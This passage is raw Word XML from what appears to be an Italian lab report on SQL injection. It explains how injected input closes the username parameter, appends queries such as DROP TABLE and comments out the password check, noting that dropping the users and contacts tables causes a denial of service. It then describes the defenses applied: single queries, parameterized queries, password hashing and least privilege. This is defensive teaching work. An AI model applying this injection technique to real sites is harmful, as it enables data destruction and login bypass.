    <w:p w14:paraId="583D84B1" w14:textId="77777777" w:rsidR="00E6145E" w:rsidRDefault="001C6E6E" w:rsidP="001C6E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">Possiamo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">eliminare le intere tabelle users e </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>contacts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> con i loro relativi dati. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4AF933" w14:textId="1443E078" w:rsidR="001C6E6E" w:rsidRDefault="00E6145E" w:rsidP="001C6E6E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Il sistema subisce un’interruzione totale del servizio (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Denial of Service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>), privando tutti gli utenti (admin compreso) delle loro informazioni</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B11EC" w14:textId="6147E8A9" w:rsidR="001C6E6E" w:rsidRDefault="007D184D" w:rsidP="007D184D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D184D">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EB588B8" wp14:editId="7D0F66F3">
            <wp:extent cx="5368637" cy="1562112"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="9119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70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8928" cy="157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A3E4" w14:textId="77777777" w:rsidR="007D184D" w:rsidRPr="007D184D" w:rsidRDefault="007D184D" w:rsidP="007D184D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="492E1640" w14:textId="7A729A04" w:rsidR="00AD239B" w:rsidRDefault="003346B6" w:rsidP="003346B6">
      <w:p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Tutti gli attacchi eseguiti utilizzano </w:t>
      </w:r>
      <w:r w:rsidR="00D56311">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>una struttura logica precisa:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2238581C" w14:textId="733555F2" w:rsidR="00AD239B" w:rsidRDefault="00D56311" w:rsidP="00AD239B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Utilizzano il</w:t>
      </w:r>
      <w:r w:rsidR="003346B6" w:rsidRPr="00AD239B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> carattere</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> apice</w:t>
      </w:r>
      <w:r w:rsidR="003346B6" w:rsidRPr="00AD239B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003346B6" w:rsidRPr="00AD239B">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003346B6" w:rsidRPr="00AD239B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> per chiudere il primo parametro nella query (</w:t>
      </w:r>
      <w:r w:rsidR="003346B6" w:rsidRPr="00AD239B">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>‘$username’</w:t>
      </w:r>
      <w:r w:rsidR="003346B6" w:rsidRPr="00AD239B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> nel nostro caso) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794B213F" w14:textId="27AA991D" w:rsidR="003346B6" w:rsidRDefault="00AD239B" w:rsidP="00AD239B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD239B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>nseriscono l’eventuale query da effettuare al DB (SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">, INSERT, DROP TABLE, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>ecc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4320E7" w14:textId="77777777" w:rsidR="00D56311" w:rsidRDefault="00AD239B" w:rsidP="00AD239B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:num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Infine i caratteri </w:t>
      </w:r>
      <w:r w:rsidRPr="00014EC5">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00014EC5" w:rsidRPr="00014EC5">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D56311">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidR="00D56311" w:rsidRPr="00D56311">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>-- -</w:t>
      </w:r>
      <w:r w:rsidR="00D56311">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D56311">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> che in SQL rappresentano l’inizio di un commento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0221DFC8" w14:textId="0F530E00" w:rsidR="00AD239B" w:rsidRPr="00AD239B" w:rsidRDefault="00D56311" w:rsidP="00D56311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 xml:space="preserve">Questo costringe il DBMS a ignorare il </w:t>
      </w:r>
      <w:r w:rsidR="00AD239B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">resto della query originale (quindi </w:t>
      </w:r>
      <w:r w:rsidR="00AD239B" w:rsidRPr="00014EC5">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>AND password = ‘$password’</w:t>
      </w:r>
      <w:r w:rsidR="00AD239B">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7421E1BA" w14:textId="77777777" w:rsidR="00106D47" w:rsidRDefault="00106D47">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609A0755" w14:textId="4AADA69A" w:rsidR="0082536D" w:rsidRDefault="0082536D" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="_Toc232068348"/>
      <w:bookmarkStart w:id="25" w:name="_Toc232079419"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>SITO DIFESO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w14:paraId="1018405E" w14:textId="77777777" w:rsidR="0082536D" w:rsidRPr="00483468" w:rsidRDefault="0082536D" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D6A0CA0" w14:textId="1239EDB4" w:rsidR="0082536D" w:rsidRDefault="00DF3023" w:rsidP="0082536D">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Per ridurre le vulnerabilità di SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="00D71BCB">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> abbiamo adottato un approccio più sicuro nella gestione delle query e</w:t>
      </w:r>
      <w:r w:rsidR="00D71BCB">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> del database, implementando il concetto di “Difesa in Profondità” per tutelare la confidenzialità, l’integrità e la </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>dispon</w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>bilità</w:t>
      </w:r>
      <w:r w:rsidR="00D71BCB">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> dei dati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4894C508" w14:textId="77777777" w:rsidR="00E4119E" w:rsidRPr="00D71BCB" w:rsidRDefault="00E4119E" w:rsidP="00E4119E">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E57986E" w14:textId="186C6579" w:rsidR="00E4119E" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc232068349"/>
      <w:bookmarkStart w:id="27" w:name="_Toc232079420"/>
      <w:r>
        <w:t>Difese a Livello di Query</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r w:rsidR="00FB1895">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517F633D" w14:textId="6C4688BE" w:rsidR="00E4119E" w:rsidRPr="00E4119E" w:rsidRDefault="00DF3023" w:rsidP="00E4119E">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Per rendere più sicure le interrogazioni al Database</w:t>
      </w:r>
      <w:r w:rsidR="00FB1895">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> abbiamo</w:t>
      </w:r>
      <w:r w:rsidR="00FB1895">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> implementato nel codice PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE83885" w14:textId="505E8BF0" w:rsidR="00244A58" w:rsidRDefault="00DF3023" w:rsidP="00244A58">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Toc232079421"/>
      <w:r>
        <w:t>Rimo</w:t>
      </w:r>
      <w:r w:rsidR="00FB1895">
        <w:t>zione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> d</w:t>
      </w:r>
      <w:r w:rsidR="00FB1895">
        <w:t>el</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Piggybacking</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F6349F0" w14:textId="74095864" w:rsidR="00E4119E" w:rsidRDefault="00FB1895" w:rsidP="00244A58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 xml:space="preserve">Sostituendo </w:t>
      </w:r>
      <w:r w:rsidR="0000563F">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>la funzione “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0000563F" w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>multi_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0000563F" w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0000563F" w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0000563F" w:rsidRPr="00FB1895">
        <w:rPr>
          <w:rStyle w:val="Code1Char"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0000563F">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE02D5">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>con l’esecuzione di query singole</w:t>
      </w:r>
      <w:r w:rsidR="0000563F">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, abbiamo rimosso la possibilità di effettuare</w:t>
      </w:r>
      <w:r w:rsidR="00BE02D5">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> comandi distruttivi</w:t>
      </w:r>
      <w:r w:rsidR="0000563F">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BE02D5">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="0000563F">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>come UPDATE, INSERT, DELET</w:t>
      </w:r>
      <w:r w:rsidR="001D0118">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="0000563F">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> e DROP TABLE</w:t>
      </w:r>
      <w:r w:rsidR="00BE02D5">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>) separati dal punto e virgola.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A0B424" w14:textId="77777777" w:rsidR="00244A58" w:rsidRDefault="0000563F" w:rsidP="00244A58">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc232079422"/>
      <w:r>
        <w:t>Utilizz</w:t>
      </w:r>
      <w:r w:rsidR="00244A58">
        <w:t>o delle</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Query Parametrizzate</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="5CDB556E" w14:textId="3247E6B1" w:rsidR="0000563F" w:rsidRPr="00B61AEC" w:rsidRDefault="00244A58" w:rsidP="00244A58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 xml:space="preserve">Tramite le Query Parametrizzate, </w:t>
      </w:r>
      <w:r w:rsidR="00E748EA">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>le istruzioni SQL vengono precompilate dal database e poi vengono inseriti i dati. I parametri forniti dall’utente quindi vengono trattati come stringhe e mai come comandi eseguibili, neutralizzando ogni tipo di SQL Injection diretta.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786D5A03" w14:textId="010423A7" w:rsidR="00124EDB" w:rsidRPr="00124EDB" w:rsidRDefault="003524A7" w:rsidP="00124EDB">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003524A7">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="22F503D4" wp14:editId="1E650557">
            <wp:extent cx="5479473" cy="925422"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8255"/>
            <wp:docPr id="69319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8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1517" cy="9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_Toc232068350"/>
    </w:p>
    <w:p w14:paraId="4E51237E" w14:textId="0F91C05C" w:rsidR="00E4119E" w:rsidRDefault="004D0DD8" w:rsidP="00D555E5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc232079423"/>
      <w:r>
        <w:t>Difese a Livello di Database</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="19CB70F7" w14:textId="4C5B2EF3" w:rsidR="00E4119E" w:rsidRDefault="007C7973" w:rsidP="00E4119E">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>Per proteggere</w:t>
      </w:r>
      <w:r w:rsidR="00660E40">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> il DB nel caso in cui l’applicazione web venga compromessa, abbiamo implementato</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFE027F" w14:textId="1C2479DC" w:rsidR="00182A14" w:rsidRPr="00182A14" w:rsidRDefault="00182A14" w:rsidP="00182A14">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc232079424"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00182A14">
        <w:t>Hashing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00182A14">
        <w:t xml:space="preserve"> delle Password</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="1E4227C7" w14:textId="41634973" w:rsidR="00E4119E" w:rsidRDefault="00660E40" w:rsidP="00182A14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 xml:space="preserve">Memorizzando solo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>l’</w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>hash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> delle password</w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00182A14">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">abbiamo fatto </w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>in modo che, se eventualmente un attaccante riuscisse</w:t>
      </w:r>
      <w:r w:rsidR="00294D9A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> ad esfiltrare</w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> la tabella degli utenti, non abbia modo di vedere in modo chiaro le varie password</w:t>
      </w:r>
      <w:r w:rsidR="00294D9A">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, preservando la confidenzialità delle credenziali</w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AC9CEE" w14:textId="16CB4286" w:rsidR="003524A7" w:rsidRDefault="003524A7" w:rsidP="00A439D9">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003524A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EC3C18F" wp14:editId="6ED71590">
            <wp:extent cx="5382491" cy="1111933"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="82770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7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5035" cy="11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81F6" w14:textId="3EA39D28" w:rsidR="00A439D9" w:rsidRPr="003524A7" w:rsidRDefault="00A439D9" w:rsidP="00A439D9">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A439D9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25D0E2CC" wp14:editId="599968BA">
            <wp:extent cx="4305673" cy="1493649"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="124094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8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6CC1" w14:textId="05F40B1B" w:rsidR="00C06220" w:rsidRPr="00C06220" w:rsidRDefault="00C06220" w:rsidP="00C06220">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc232079425"/>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:t xml:space="preserve">rincipio del “Least </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007C7973">
        <w:t>Privilege</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007C7973">
        <w:t>”</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="6FAFA743" w14:textId="77777777" w:rsidR="00294D9A" w:rsidRDefault="00294D9A" w:rsidP="00C06220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>L’applicazione web non si connette più tramite l’utente root, ma usa un utente dedicato con meno permessi a livello di modifiche del DB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D5C967" w14:textId="5FF3BE9A" w:rsidR="007C7973" w:rsidRPr="007C7973" w:rsidRDefault="0021048F" w:rsidP="00C06220">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">A questo utente sono stati solo dati </w:t>
      </w:r>
      <w:r w:rsidR="007C7973">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>i permessi di lettura, inserimento, aggiornamento e eliminazione di singole righe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>, revocando</w:t>
      </w:r>
      <w:r w:rsidR="00C05117">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t xml:space="preserve">i permessi </w:t>
      </w:r>
      <w:r w:rsidR="00C05117">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>di poter alterare intere tabelle (es DROP TABLE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:t>. Questo previene la distruzione delle tabelle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3880C9D5" w14:textId="6214BCFE" w:rsidR="007C7973" w:rsidRPr="0082536D" w:rsidRDefault="00124EDB" w:rsidP="00124EDB">
      <w:pPr>
        <w:spacing w:line="216" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00124EDB">
        <w:rPr>
          <w:lang w:val="it-IT"/>
        </w:rPr>
        <w:drawing>
